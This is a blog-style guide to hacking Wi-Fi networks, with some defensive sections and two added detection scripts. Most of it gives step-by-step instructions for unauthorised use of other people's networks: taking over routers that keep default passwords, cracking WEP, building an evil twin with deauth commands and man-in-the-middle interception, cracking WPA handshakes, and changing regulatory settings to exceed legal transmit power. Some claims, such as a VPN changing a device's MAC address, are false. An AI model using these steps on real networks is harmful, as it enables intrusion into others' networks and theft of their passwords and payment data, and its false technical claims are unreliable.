Hacking for Free Internet (Wi-Fi)
One of the most common targets of criminal hackers is internet connections (wi-fi). When you think about it, free internet access allows criminal hackers to not only get free bandwidth but to also conceal their location and identity.
What happens when your internet connection gets hacked? Your connection not only slows down, but your identity and location also get used for any illegal activity that a criminal hacker may do using your network.
At the same time, it also becomes very possible for a criminal hacker to get deeper access to your personal computer, thanks to discovered vulnerable ports and shared network devices such as printers. If your mobile phone is also synced to your computer, there is a risk that a criminal hacker would also get access to that device.
For this reason, it is very important to know how your internet connection can be hacked. In this blog, you will learn how most criminal hackers opt to crack your Internet connection through the most popular hack tools.
Check for Unchanged Router Passwords
This is probably the easiest way to hack an Internet connection. All you need to do is to see all the available networks that you can connect to. To do that, switch on your computer’s WiFi and look at the list of available networks in your vicinity.
Now, you would see that there are common router names in the list of available networks, such as Linksys.
There is a big chance that the default password for these routers is unchanged, so all you need to do is to log in with the manufacturer’s default password.
How do you do that? You just need to go to the manufacturer’s website and look up the router’s manual.
If you are able to get into the target network using the default password, open a fresh browser and log in to the GUI of the target router. If your target is a Linksys router, the IP address that shows its GUI is 192.168.1.1.
Once you are prompted for login credentials, leave the username blank, and type in “admin” for a password. (Note: Some routers have different default login credentials depending on the model. You can check for these on the manufacturer’s website.)
Once you are in the GUI, you can change the SSID, the router password, and the security protocol of your target router. This way, you would be able to take full control of the router and prevent the network owner from connecting to his own ISP!
This method relies on the fact that many Internet users are not careful about securing their Internet connection before putting it to use.
You would be surprised that there are people who do not even bother changing the SSID of their Wi-Fi, which is almost a giveaway that it is not secured by a password other than what the manufacturer uses.
Hack Internet Password
What would hackers do when the Wi-Fi that they are trying to hack is secured? The next thing that they would do is to check how possible it is to guess what the password of their targeted network is.
At this point, you would need to learn a few key terms when it comes to identifying and assigning security to Wi-Fi connections:
1. WEP – means Wired Equivalent Privacy. This is the most basic form of Wi-Fi encryption, and thus an unsafe option for most Internet users when it comes to securing their wireless connection.
This type of encryption can be cracked with ease using the most basic hacking tools. Older Wi-Fi models still use this type of encryption.
2. WPA – means Wi-Fi Protected Access. This is a more secure option for newer computer and router models, which can only be efficiently cracked through the old-fashioned trial-and-error method of guessing potential letter or word combinations (also known as dictionary attacks).
If a strong password is used, a WPA connection may be almost impossible to crack. Another variation of this security protocol is WPA2, which is tougher to penetrate.
At this point, you have the idea that most hackers would opt to hack available networks that are protected through WEP protocol since it is faster and much easier to crack. Here is a list of tools that a hacker needs in order to crack a WEP-protected Internet connection:
1. A wireless adapter – you would need a wireless adapter that is compatible with software called CommView. This software allows your wireless card to enter monitor mode.
To see if your wireless card is compatible with CommView, head over to Wired and Wireless Network Analysis Software by TamoSoft and see if your adapter is on the list.
2. CommView – CommView for WiFi is software used to capture packets from your target network. All you need to do is install it and then follow the installation guide to install its drivers for your wireless card.
3. Aircrack-ng GUI – this software enables you to crack the password of your target network after you are done capturing packets.
Follow the steps below to start cracking a WEP-encrypted network:
1. Run CommView for WiFi to start scanning for wireless networks by channel. Leave it running for a few minutes. You would then see a long list of networks that your wireless adapter can reach.
2. Choose a WEP network (you would see this right next to the name of each network on the list). Select a network that has the lowest decibel (dB) rating and has the highest signal.
3. Once you have chosen your target, right-click it to open a context menu. Click on Copy MAC Address.
4. Head over to the Rules tab on the menu bar and select MAC Addresses. Tick on the MAC Address rules.
5. For the Action option, choose CAPTURE. Afterward, head over to the Add Record option and choose BOTH.
6. Once you are done formatting the rules, paste the mac addresses that you copied on your clipboard to the box that you would find below it.
7. When capturing packets, remember that you only need to capture the ones that will be used for cracking. To make sure that you only capture the packets that you need, select option D (which you would find on the bar right above the window) and deselect Management Packets and Control Packets.
8. Make sure that you save the packets that you have captured so that you can crack them for later. Go to the Logging tab on the menu bar and enable Auto Saving. Afterward, set the Average Log File Size to 20 and the Maximum Directory Size to 2000.
9. Now, wait until you capture enough data packets. Make sure that you wait until you have at least 100,000 data packets so that the crack has a decent chance of succeeding.
10. After collecting enough data packets, head over to the Log tab and select all the logs that have been saved during capture. Head over to the folder where your saved logs are stored.
Click on File, and then Export, and select Wireshark tcpdump format to save it as a .cap file. Choose any destination that you would easily access later on. Do not close CommView.
11. Now, you are ready to crack. Run the Aircrack-ng GUI and choose the WEP option. You would be prompted to open the .cap file that you have exported a while ago. Once you retrieve that file, select Launch.
12. Once your Aircrack-ng GUI is running and decrypting the data packets that you had on your log, open the command prompt. Type in the index number of the network that you have selected a while ago.
13. Wait until the wireless key appears.
If everything goes well, you would easily get the wireless key of your targeted network. If you missed some packets, you would be prompted by Aircrack-ng that you need to capture more of them. If that happens, you just need to wait for CommView to get the additional packets that you need.
Can Tougher Security Measures be Breached?
At this point, you would realize that it is fairly easy for most hackers to identify the type of Internet security that you are using.
At the same time, you should also have the idea that once criminal hackers know what type of encryption you are using, the easier it is for them to identify the tools that they should use for hacking your network.
Is it possible for hackers to breach more advanced protocols such as WPA and WPA2?
Yes, they could accomplish such a feat, but it would take them more time – making the process inefficient, especially given that their goal for hacking network connections is to enjoy better bandwidth and have immediate internet access or even to mask their location.
For this reason, it would be best to enable WPA (or other better encryption options) should your devices allow it.
Now that you have a general idea on how hackers can steal your Wi-Fi, it is time to take some preventive measures. The next blog will tell you more about that.
Securing Your Network
It is possible for Internet connections to get stolen, but there are many ways to dissuade hackers from getting their hands on your bandwidth. If you think that someone is leeching on your Wi-Fi, it pays to check the users that are connected to your network.
Tell-Tale Signs of Breach
You can almost be certain that an unauthorized user is connected to your network if you experience the following:
1. You are experiencing intermittent Internet connection
If you usually have a high-speed Internet connection and normally have no problems streaming or viewing pages, but now you do, it is very possible that an extra user is logged in to your Wi-Fi.
2. You see changes in your Public folder
If you are the sole Internet user in your household, or you are very certain of the contents of your network’s shared folders, then there should be no reason for you to see any new or altered files in your Public folders.
The best way to check that is to pull down the context menu of any suspected files and see when they were last accessed or modified. If you do not remember accessing them on the displayed date and time, then somebody else is accessing them without your knowledge.
3. Your shared devices are behaving strangely
If your printer and other gadgets that can be accessed through the network are behaving strangely, or there are unknown devices that are suddenly included in your network, then somebody else must be using your network for remote access.
4. Your router’s lights keep on blinking even when you are offline
One of the low-tech ways to see whether there is an unauthorized Wi-Fi user on your network is to disable the connection on all your wireless devices. If your router’s wireless lights are blinking, then there is another user that is making use of your internet connection.
5. You have an unidentified user on your network’s console
You can see all the devices and their corresponding MAC addresses on your network’s admin console. All you need to do is to enter your router’s assigned IP address on your browser, enter your login credentials, and then check all the attached devices.
If there is an unrecognizable device on that list, then you can be certain that someone is snooping around on your wireless connection.
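As an added example (not part of the original post), here is a small Python script that automates the check just described: it parses an attached-devices table of the kind a router’s admin console shows and reports every MAC address that is not on your own allow-list. The table, the allow-list and every MAC address in them are constructed for the example.

```python
"""Check a router's attached-devices table against an allow-list of known MACs.

Added example, not part of the original post. The device table below is
constructed to look like the 'attached devices' view of a home router's
admin console (or the output of `arp -a`); every MAC address in it is made up.
"""
import re

# Constructed allow-list: the hardware addresses of your own devices.
KNOWN_DEVICES = {
    "a4:5e:60:11:22:33": "my-laptop",
    "f0:9f:c2:44:55:66": "my-phone",
    "00:1e:8f:77:88:99": "printer",
}

# Constructed attached-devices table as copied from a router console.
# Routers are inconsistent about case and separators, which the parser handles.
ATTACHED_DEVICES_TABLE = """\
Name            IP Address      MAC Address
my-laptop       192.168.1.10    A4:5E:60:11:22:33
android-7f3a    192.168.1.15    3C-71-BF-AA-BB-CC
printer         192.168.1.20    00:1e:8f:77:88:99
my-phone        192.168.1.12    f0:9f:c2:44:55:66
<unknown>       192.168.1.33    9c:b6:d0:de:ad:01
"""

# Six hex pairs separated by ':' or '-'.
MAC_RE = re.compile(r"\b[0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5}\b")


def normalize_mac(mac: str) -> str:
    """Canonical form (lowercase, colon-separated) so that '3C-71-BF-AA-BB-CC'
    and '3c:71:bf:aa:bb:cc' compare equal."""
    return mac.replace("-", ":").lower()


def parse_device_table(text: str) -> list:
    """Return one {'name', 'ip', 'mac'} record per table row that carries a MAC;
    header lines and blank lines have no MAC and are skipped."""
    devices = []
    for line in text.splitlines():
        match = MAC_RE.search(line)
        if not match:
            continue
        fields = line.split()
        devices.append({"name": fields[0], "ip": fields[1],
                        "mac": normalize_mac(match.group(0))})
    return devices


def find_unknown_devices(text: str, known: dict) -> list:
    """Every parsed device whose MAC is not on the allow-list."""
    allowed = {normalize_mac(mac) for mac in known}
    return [d for d in parse_device_table(text) if d["mac"] not in allowed]


if __name__ == "__main__":
    for device in find_unknown_devices(ATTACHED_DEVICES_TABLE, KNOWN_DEVICES):
        print(f"UNKNOWN DEVICE: {device['name']:<14} {device['ip']:<15} {device['mac']}")
```

Run it after pasting the device table out of the router console. Because a MAC address can be spoofed, a clean result is a detection signal rather than proof: a device that clones one of your own MACs will not be reported as unknown, which is why changing the password and SSID remains the actual fix.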
Beef Up Your Security and Auditing Measures
If you confirmed your suspicion that there is someone leeching on your Internet connection, the best way to prevent them from getting access is to change your router’s password and SSID immediately.
This way, the unauthorized user would be immediately kicked out of your network. To take things further, you may also opt to disable SSID broadcast so that your Internet connection would not be detected as an available network anymore.
However, this solution may be temporary if you are against a sophisticated hacker. Keep in mind that it is possible for some hackers to mask their MAC address through MAC spoofing, which means that their device may not appear on the list of attached devices when you check your router’s GUI.
When this happens, you may want to use more sophisticated tools for auditing connected devices on your network to check for any sleuthing activities. Here are some tools that you can use to make sure that you identify all unauthorized users on your network and prevent them from connecting to your router once and for all:
1. GlassWire
GlassWire serves as both a security system and a firewall. If you subscribe to the Pro version, you would gain access to the Network view that would enable you to see all the devices connected to your network.
You can also get a full report on how your bandwidth is being used, which includes a detailed graph of what running applications are using up bandwidth.
It would also alert you whenever there is an application that is trying to apply changes on your computer, or when an installer is trying to add a driver to your system.
What makes it a good security feature to your computer is that it would always alert you when there is a new device that connects to your wireless connection. If you are running a network of computers, this feature would be a most welcome addition to your security protocol.
2. Wireless Network Watcher by Nirsoft
This software is a clean program that works without any nag popup screen or adware, and for those who are trying to save up space, this tool does not even need to be installed.
All you need to do is to download the tool and launch it, and then it would start displaying all devices, MAC addresses, and Wi-Fi network hardware of all connected devices. This tool even allows you to identify devices that do not come with a specific device name, like Android devices.
This free wireless auditing tool is among the favorites of law enforcement organizations since it can tell you the location of any wireless hacker based on the information that they send across the network. It is fairly accurate in pinpointing locations up to two meters.
It does not run as an executable Windows file, so you would need to burn this file into a bootable CD. To use this program effectively, you would want to use a wireless card with a directional antenna, and then walk around with your laptop to triangulate and pinpoint the physical location of a wireless hacker.
Dealing with Fake Wi-Fis
If you are on the go and you need to send a quick email, it would be fairly tempting to log in to any available wireless network that seems to be unprotected by a password. Now, wouldn’t you think that it is just too convenient that an unprotected WLAN is available?
Hackers know that people will take the bait of free Wi-Fi because people do not think twice before connecting to an available hotspot in a public place.
Because hackers know that most people are not thinking about their devices’ safety when there is free internet access on the line, they are confident that people would fall for their trap.
Fake Wireless Access Point Theft
This hacking technique, also known as the evil twin access point, is mostly done in public areas, where a hacker disguises an access point as a free internet connection and prompts people to connect to it. Once a victim connects to the fake wireless connection, the hacker is able to collect sensitive data from the connected device.
Usually, hackers who use this technique prompt the user to log in using any sensitive information (such as credit card information) in exchange for free access.
While the hacker stores this information for future use, he would redirect the targeted user to sites that people commonly visit, such as a browser’s home page, an email login page, or even social media sites.
From here on, the hacker would collect password information. Hackers then use the collected data to log in to other sites, assuming that their victims are using the same passwords for multiple sites.
Apart from knowing just the password of a targeted Internet user, an evil twin access point also allows you to see the traffic that comes in and out of a connected device. That means that creating an evil twin access point also allows you to view all the activities of a potential target.
The biggest telltale sign that you have been a victim of this type of hack is when you receive notices from your credit card company about charges that you did not make or that your social media account has been taken over.
However, if you think that you have connected to an evil twin access point, there is no telling what kind of information about your computer usage, or your files, have already been shared to thousands of hacker forums.
How an Evil Twin Access Point is Made
Creating a fake wireless access point would need almost the same tools that you use in hacking a Wi-Fi, which is the wireless card and the aircrack-ng suite.
This suite has a tool called airbase-ng, which can convert your wireless card into an access point. This tool would allow you to see all the traffic coming from a connected device and also enable you to make a man-in-the-middle attack.
The following hack would enable you to clone an existing access point (or your neighbor’s internet connection) and fool a target into connecting to a fake access point.
The objective of this hack is for you to know how a criminal hacker would be able to easily select a target within range, bump him off his own connection, and then force him into connecting to a false duplicate of his WLAN connection.
This would show you how any hacker would be able to monitor his target’s traffic, and also obtain sensitive information.
Here are the steps that you need to take in order to create an evil twin access point:
1. Start Airmon-Ng and check your wireless card. Run the following command: bt > iwconfig.
After doing so, you would be able to see that your wireless card is operational. It would most probably be assigned as wlan0 once it is up and running.
2. Once your wireless card is set, run it into monitor mode.
To do this, simply enter: bt > airmon-ng start wlan0
3. By running the previous command, you would be able to see all the wireless traffic that your wireless card can monitor with its antenna. That means that you would be able to see all the SSIDs of access points that the people around you are connecting to.
Now, you would need to capture this traffic. To do this, enter: bt > airodump-ng mon0
4. In order for you to dupe people into connecting to a fake wireless connection, you would need to clone an existing access point and convert it into an evil twin. Doing so would also allow you to insert your own packets or pieces of data into a target’s computer.
5. Now, all you need to do is to wait for your target computer to connect to his internet connection. When that happens, it would appear on the lower part of the screen.
6. Once your target has connected to his own access point, you would need to create a new access point using the same SSID and MAC Address of his WLAN.
The MAC Address would appear as the BSSID in the list of access points that your wireless card was able to detect during monitor mode. You would also need the channel where your target’s signal is.
Once, you have the information that you need, pull up a new terminal and enter the following command:
bt > airbase-ng -a (BSSID) --essid "(name of the access point)" -c (channel) mon0
7. Now, you would need to take your target off his access point and force him to automatically reconnect to the fake access point that you have created in the previous step.
To do this, you would need to inject a deauth packet using the following command: bt > aireplay-ng --deauth 0 -a (BSSID of target)
8. Here is one crucial aspect that hackers are aware of when they are creating an evil twin: the fake access point that you have should be close to the strength or stronger than the signal of the target’s true access point. If you are in a public place, this should not be a problem.
However, if you are targeting devices that are far from you, you would need to turn up your fake access point’s power.
To boost your access point’s signal to its maximum, key in the following command: iwconfig wlan0 txpower 27
Typing in this command would allow you to boost your access point’s output to the maximum allowable power in the United States, which is 500 milliwatts or 27 dBm. If your target is too far, you may need to boost your access point’s power up to what your wireless card would allow you to.
Every country has Wi-Fi regulations, and the maximum allowable power for access points in another country may be illegal in yours.
Make sure that when you do the following hack, you are backed by your company and that you have obtained prior written consent from your practice target to avoid any legal repercussions of the next steps.
If you want to use another country’s maximum regulated power to boost your access point a little further (Bolivia has more available channels and can allow you to boost up to 1000 mW), you can use the following command to switch regulations: iw reg set BO
Once you are in this country’s regulatory domain, you can boost your wireless card to the maximum by typing the following command: iwconfig wlan0 txpower 30
To check for the output power, type: iwconfig
Now, you are guaranteed that all device users that are looking at available networks around you are seeing your access point in its full signal. If you boosted the signal to 30 dBm or 1000 mW, your fake access point would possibly be seen even from a few blocks away.
By boosting the signal, hackers are able to create the impression that their fake network is legitimate.
However, there is something you should keep in mind as you boost your wireless equipment’s power – overheating becomes a much greater risk as you move towards the higher output. So, it is recommended to at least consider lowering the device’s temperature, which is usually done by increasing airflow.
9. Now that you have successfully created a fake access point, the next step is to monitor the activity of your targets. You can use the software called Ettercap to start creating man-in-the-middle activities, which means that you can set up shop in this connection by intercepting, injecting traffic, or analyzing all the data that comes and goes into a target device.
Through this activity, you would be able to intercept all possible sensitive information that he may unknowingly pass through the evil twin network, such as passwords, credit card information, downloads, and uploads.
Now that you know how most hackers can set up shop in your devices by duping you into connecting to a fake access point, it’s time to take preventive measures. Here are some ways on how you can prevent attacks like this:
1. Ask for legitimate Wi-Fi service
The best defense against evil twin attacks is to verify what network you are connecting to before you connect. If you are in a public space, such as a café, make sure that you ask for the shop’s SSID and password. If you think that free Wi-Fi is too good to be true, it most probably is.
2. Always use different log-ins.
If there is no choice but to log in to a free public Wi-Fi, then make sure that you are using a different username and password to prevent giving everyone listening to the network a free pass to your most sensitive accounts.
3. Use a Virtual Private Network (VPN)
A VPN masks your device’s physical location by assigning you a different IP address and even a MAC Address.
It would also encrypt the data that you are sending out, which means that all the information that you are using to fill out any form on an evil twin network would not be deciphered by any hacker that would be listening on the other end.
VPNs are also great when it comes to detecting any evil twin network – if a free hotspot is prompting you to disconnect your VPN before you continue, then you know that the hackers on the other end are forcing you to disable any encryption that they can’t read through so that they can steal your data.
4. Be extra cautious when your devices suddenly disconnect from your secured internet, especially when all other devices that are connected to the network are also bumped off. It is very possible that a deauth packet has just been injected into your access point, forcing every device connected to it to disconnect.
When this happens, turn off the auto connect feature of your devices to prevent them from connecting to a potential evil twin access point.
5. If you are in an unfamiliar public area, turn off the auto connect to the hotspot feature of your devices.
6. Pay attention to any pop-ups and dialog boxes that tell you that there is another device that connected to your network.
7. Pay extra attention to the URL of the pages that you are connecting to. Most companies do advertise unencrypted versions of their websites, simply because HTTP is easier to remember than https.
Always remember that the added “s” means that you are visiting a secure site. Also, make sure that there is a lock icon on the browser when you are entering sensitive information.
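Measures 4 to 6 above describe two symptoms a defender can actually watch for: a second radio advertising your SSID, and a burst of deauthentication frames. As an added example that is not part of the original post, the Python below runs both checks over a constructed log of 802.11 management frames (in practice the records would come from a monitor-mode capture); the SSIDs, BSSIDs and timestamps are made up.

```python
"""Two detections for the evil-twin symptoms described above:
(1) a beacon advertising one of *our* SSIDs from a BSSID we do not own, and
(2) a burst of deauthentication frames claiming to come from our access point.

Added example, not part of the original post. FRAMES is a constructed log of
802.11 management frames; a real monitor would build it from a monitor-mode
capture. SSIDs, BSSIDs and timestamps are made up.
"""
from collections import defaultdict

# Constructed: the access point(s) the defender actually owns.
TRUSTED_APS = {
    "HomeNet": {"bssid": "00:11:22:aa:bb:cc", "channel": 6},
}

# Constructed frame log: (seconds since start, frame kind, fields).
FRAMES = [
    (0.0, "beacon", {"ssid": "HomeNet", "bssid": "00:11:22:aa:bb:cc", "channel": 6}),
    (0.2, "beacon", {"ssid": "CoffeeShop", "bssid": "66:77:88:99:aa:bb", "channel": 1}),
    # A second radio advertising our SSID from a BSSID we do not own.
    (5.0, "beacon", {"ssid": "HomeNet", "bssid": "de:ad:be:ef:00:01", "channel": 11}),
    (5.1, "beacon", {"ssid": "HomeNet", "bssid": "de:ad:be:ef:00:01", "channel": 11}),
] + [
    # Six broadcast deauthentication frames within half a second.
    (6.0 + 0.1 * k, "deauth", {"bssid": "00:11:22:aa:bb:cc", "dst": "ff:ff:ff:ff:ff:ff"})
    for k in range(6)
] + [
    # A lone deauth a minute later: ordinary roaming, must not alert.
    (66.0, "deauth", {"bssid": "00:11:22:aa:bb:cc", "dst": "a4:5e:60:11:22:33"}),
]

DEAUTH_THRESHOLD = 5    # this many deauth frames ...
DEAUTH_WINDOW_S = 2.0   # ... within this many seconds is a flood


def detect_evil_twins(frames, trusted=TRUSTED_APS):
    """Alert once per (ssid, bssid) pair that advertises a trusted SSID from an
    unexpected BSSID. SSIDs we do not own are ignored: a neighbour's network
    is not ours to judge."""
    alerts, seen = [], set()
    for ts, kind, f in frames:
        if kind != "beacon" or f["ssid"] not in trusted:
            continue
        key = (f["ssid"], f["bssid"])
        if f["bssid"] != trusted[f["ssid"]]["bssid"] and key not in seen:
            seen.add(key)
            alerts.append(f"{ts:.1f}s possible evil twin: SSID {f['ssid']!r} "
                          f"from unknown BSSID {f['bssid']} on channel {f['channel']}")
    return alerts


def detect_deauth_floods(frames, threshold=DEAUTH_THRESHOLD, window=DEAUTH_WINDOW_S):
    """Alert once per BSSID when at least `threshold` deauth frames arrive
    within `window` seconds. Single deauths are normal; bursts are not."""
    alerts, alerted = [], set()
    recent = defaultdict(list)          # bssid -> timestamps inside the window
    for ts, kind, f in frames:
        if kind != "deauth":
            continue
        stamps = recent[f["bssid"]]
        stamps.append(ts)
        while stamps and ts - stamps[0] > window:   # slide the window forward
            stamps.pop(0)
        if len(stamps) >= threshold and f["bssid"] not in alerted:
            alerted.add(f["bssid"])
            alerts.append(f"{ts:.1f}s deauth flood: {len(stamps)} frames from "
                          f"{f['bssid']} within {window:.0f}s")
    return alerts


if __name__ == "__main__":
    for line in detect_evil_twins(FRAMES) + detect_deauth_floods(FRAMES):
        print(line)
```

Deauthentication frames are unauthenticated in the original 802.11 standard, which is why a single forged frame is enough to disconnect a client; access points and clients that support 802.11w (Protected Management Frames) reject forged ones, so enabling it where available removes the cause rather than just spotting the symptom. The trusted-AP list is what keeps a legitimate second access point, such as a mesh node or range extender, from being reported as an evil twin.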
Detecting and Targeting Wireless
In addition to standard wired networks, you will encounter a myriad of wireless networks and devices during your investigations. As such, you must have a strong knowledge of what they are, how to work with them, and how to potentially strike at them during your pen-test.
Wireless technology extends a company’s network into areas that wired networks cannot go (or go easily). Reception for wireless networks can now easily extend into nontraditional areas such as coffee shops, hotels, libraries, public parks, lobbies, shopping malls, and restaurants, to name a few.
This greater range, as well as issues such as access, ease of setup, and unique security and setup requirements, has made wireless a prime target for attacks.
In this section, you’ll learn to:
Break wireless encryption technologies
Conduct a wardriving attack
Break the Internet of Things
An Introduction to Wireless
Wireless (Wi-Fi) collectively refers to the group of technologies covered by different frequencies and capabilities of wireless networks.
Nowadays nearly every gadget, device, and household appliance contains wireless technology. Wireless may be the only networking technology you find on your new gadget or device, with wired networking optional in many systems.
With all the convenience that the technology offers, the risks have increased, in some cases dramatically, compared to traditional wired networks.
Attacking parties have found wireless networks to be much easier to target and penetrate than wired networks, and many companies have slowed their implementation or needlessly exposed themselves to security risks.
Of course, there are drawbacks to every technology:
The range of wireless networks is not as good as that attained by traditional wired networks.
Interference is common on wireless networks due to the presence of other wireless devices and environmental factors. Interference means lower performance, dropped connections, reduced distance, and other issues. Performance and distance of wireless networks are never what is promised on the device itself and is usually around half of the numbers specified.
Security is a concern on wireless networks because the signal covers a much broader area than a traditional wired network can. Wireless-enabled devices are the norm and users of these devices tend to always look for open access points, in many cases not giving much care to whether or not they are secure.
Geographic and environmental conditions can have a tremendous impact on the range and speed of a network. Changes in air density, trees, walls, temperature, and other conditions will affect wireless networks.
There are many advantages that make wireless a great target of opportunity:
Can go places where wires would be impossible to place and thus easier to access
Available in many places where wired networks do not exist or can’t exist
Extremely common technology
A wireless network relies on radio frequency (RF) to send and receive information, so understanding RF will assist you in working with these networks. Much like Ethernet networks, Wi-Fi networks are concerned with what happens at the physical layer of networking.
The physical layer defines how stations will connect, transmit, receive, and format signals for use on a network, which, in this case, is wireless.
Recognizing the Components of a Wireless Network
Wireless technology has a special language and a set of terminology. Though you may not hear all the terms all the time, familiarity with them is important, so I will introduce you to each and their respective function or place.
Service Set Identifier (SSID) This is the name that is broadcast by a wireless access point that identifies itself to potential clients.
You have already seen an SSID appear in your favorite wireless client as the text string that appears in the list of available wireless networks. The name can be made up of a combination of letters and numbers.
An SSID is used to identify a wireless network to clients. However, wireless networks can have their SSID either visible or hidden depending on the situation. On open networks, the SSID is visible and can be viewed by any client searching for it. On closed networks, the SSID is not visible and in some cases is said to be cloaked.
Association When a wireless access point and a wireless client connect while getting ready to exchange information, it is called an association.
Hotspot This is any location that provides wireless access to an area such as a coffee shop, airport, library, lobby, or similar location.
Access Point This is a hardware device or software application that allows a wireless network to be established. Clients connect to the access point for network services.
When working with the standard access points sold in consumer electronic stores, changing the antenna is not an option. However, where a large and more powerful enterprise access point is involved, the selection of an antenna is much more important.
Let’s take a look at the different types of antennas that you may encounter and what each may mean to you as a security person.
Wi-Fi Authentication Modes
Clients associating with an access point must not only be in range and speaking the language, but they must also perform some sort of authentication. There are two major types:
Open System Authentication (OSA) is used in situations where the access point can be attached to by any client. This type of authentication occurs when an authentication frame is sent from a client to an access point (AP).
When the AP receives the frame it verifies its SSID, and if correct the AP sends a verification frame back to the client, completing the connection sequence.
It is important to remember that just because this process has completed successfully it does not in any way mean that the client will be able to access the network resources. All that has happened is that the client can attach to the access point.
Shared Key Shared key authentication is different from OSA. A client receives a key ahead of time, which allows them to attach to the network.
In a few steps, this is how shared key authentication works:
1. The client sends an authentication request to the access point.
2. The access point returns a challenge to the client.
3. The client encrypts the challenge using the shared key it is configured with.
4. The access point uses the same shared key to decrypt the challenge; if the responses match, then the client is validated and is given access to the network.
Breaking Wireless Encryption Technologies
One of the things that has made wireless networks less than attractive to companies traditionally is their perceived lack of security, or weak security. Since wireless networks transmit their signals over the air, the information is more vulnerable than it would be on a wired network.
Without adequate protection, the information can be easily sniffed and even captured by a third party. To reduce this problem, encryption is commonly implemented to make the likelihood of interception lower.
The three most common technologies used to protect wireless networks are as follows:
Wired Equivalent Privacy (WEP) The oldest and the weakest of the technologies, the WEP standard was introduced as the initial attempt to provide wireless security but was found to be flawed and highly vulnerable not long after it debuted.
Wi-Fi Protected Access (WPA) The primary successor to WEP, WPA was intended to address many of the problems that plagued WEP and could be deployed on existing WEP hardware. It succeeded in fixing many of them and is a much stronger system, but it still has vulnerabilities. WPA's main mechanism is TKIP, which keeps WEP's RC4 cipher but adds per-packet key mixing and a message integrity check; AES-CCMP was optional in WPA.
WPA2 This successor to WPA was intended to replace WPA and fix its remaining problems. WPA2 is much stronger and uses AES in CCMP mode as its mandatory cipher; TKIP is retained only for backward compatibility with WPA-era clients and should be disabled where possible. WPA2 also comes in a Personal mode (a preshared key) and an Enterprise mode (802.1X/EAP with an authentication server).
With all the alphabet soup revolving around security protocols, which is the best to use? Which is the most vulnerable? Which is the strongest? Let’s take a look to see what is what with security and wireless.
When wireless networks were first introduced to the public, the need for security was readily obvious and the creators of wireless introduced WEP to provide this ability. WEP is the oldest of the security protocols available for wireless networks and also happens to be the most vulnerable.
When originally introduced with the 802.11b standard, WEP was intended to make wireless networks as secure as wired networks. However, this proved not to be the case as the technology was not up to par.
On the surface, WEP looks like a good technology because it uses a well-known cryptographic primitive, the RC4 stream cipher, but in actuality the implementation was extremely poor.
It is now known that the technology is weak at best. WEP was created with good intentions, but it was designed by people who were not cryptographers and who did not enlist the aid of any.
So sound building blocks such as RC4 were used in an ineffective way: the 24-bit initialization vector (IV) is so short that keystream is reused on a busy network within hours, the IV is simply prepended to the secret key, which exposes the key through weaknesses in RC4's key schedule, and the CRC-32 integrity check is linear and can be fixed up after modifying a packet.
WEP was intended to provide the following:
Defeat eavesdropping on communications and attempts to reduce unauthorized disclosure of data
Check the integrity of data as it flows across the network
Use a shared secret key to encrypt packets prior to transmission
Provide confidentiality, access control, and integrity in a lightweight, efficient system
Its problems arise from the following circumstances:
The protocol was designed without input from the academic community.
It provides no mechanism for key distribution and instead relies on preshared keys. This leads to many users never changing their keys due to the amount of work involved.
An attacker gaining enough ciphertext and plaintext can analyze intercepted network traffic and uncover the key.
Undoubtedly, you have heard a lot about how poor the WEP protocol is and how it should not be used. What we are going to explore is how WEP is broken so you can see the process and how everything pulls together.
To perform this process from end to end, including the process of cracking the keys, follow these steps:
1. Start the wireless interface on the attacking system in monitor mode on the access point's channel. Monitor mode observes every frame in the air without connecting to an access point.
2. Probe the target network with the wireless adapter to determine whether packet injection can be performed (aireplay-ng -9 runs this test).
3. Use aireplay-ng to perform a fake authentication with the access point so that it will accept injected frames from your MAC address.
4. Start the sniffing tool (airodump-ng) to capture initialization vectors (IVs). With aireplay-ng, ARP request packets can be intercepted and reinjected into the network, causing the access point to generate many more encrypted packets, and therefore IVs, which are then captured.
5. Run a tool such as aircrack-ng to recover the encryption key from the captured IVs.
Moving from WEP to WPA
After WEP was found to be terribly flawed and irreparably broken, Wi-Fi Protected Access (WPA) was introduced. WPA was designed to be a software upgrade instead of requiring a full hardware upgrade, making implementation easy via service packs or software updates.
The most significant development introduced with WPA was TKIP, the Temporal Key Integrity Protocol, to improve data encryption. TKIP derives a fresh per-packet key by mixing the temporal key with the sender's address and a 48-bit sequence counter, and adds the Michael message integrity check; WEP, in contrast, uses the same key for every packet until an administrator changes it. Rotating keys this way makes WPA far more difficult to crack than WEP.
WPA does suffer from the following flaws:
Weak keys chosen by the user, which make the passphrase guessable offline (see below)
Packet spoofing: the Michael integrity check can be defeated to inject a small number of forged packets into a TKIP network
Cracking WPA and WPA2
To crack WPA, a different approach must be used than with WEP. Fortunately, one of the best tools available for attacking WPA is freely available in Kali Linux in the form of Reaver. Reaver does not attack WPA itself; it brute-forces the PIN of Wi-Fi Protected Setup (WPS) on routers that have it enabled, and a router that accepts the PIN hands over the WPA preshared key used to access the network. Disabling WPS closes this hole.
WPA2 is an upgrade to WPA, introduced to fix the defects in the original. WPA2 offers much-improved security over its predecessor and is the Wi-Fi Alliance certification of the full IEEE 802.11i security standard.
WPA and WPA2 both suffer from vulnerabilities that can be exploited by you, the pentester. Each offers a way to penetrate the security of an otherwise strong protocol.
So, how can you attack WPA and WPA2?
Offline Attack This attack works by being close enough to the access point to observe what is known as the handshake between the client and the access point. The handshake is the 4-way key exchange that takes place after a client associates, when an initial connection attempt is made.
The passphrase itself is never transmitted, but the handshake frames are sent in the clear every time, and they carry the two nonces, both MAC addresses and a message integrity check (MIC) computed with a key derived from the passphrase and SSID. Capturing them gives the attacker everything needed to test candidate passphrases offline: derive the key from each guess and check whether it reproduces the captured MIC. The access point is never contacted during the cracking, so there is nothing for it to detect or lock out.
Deauthentication Attack Rather than waiting for a client to connect, this attack sends spoofed deauthentication frames (aireplay-ng -0) to force an already-connected client off the network. The client reconnects automatically, the attacker captures the resulting handshake, and the key is cracked offline exactly as above.
Extracting Keys In situations where preshared keys are entered into each client, it is possible to physically gain access to the client and retrieve the key from there.
Brute-Force WPA Keys The lowest technological attack is to break the key by good old brute force or, more commonly, a dictionary attack against the captured handshake. This is typically performed with tools such as aircrack-ng or KisMAC on the capture, or with a GPU cracker such as hashcat.
The downside of this attack is that it can take a long time or a lot of computing power to recover the key, because each candidate requires 4,096 rounds of PBKDF2 before it can be tested. Guessing against the live access point instead of the capture is far slower and may lock up the access point or set off detection mechanisms; in practice the handshake is always cracked offline.
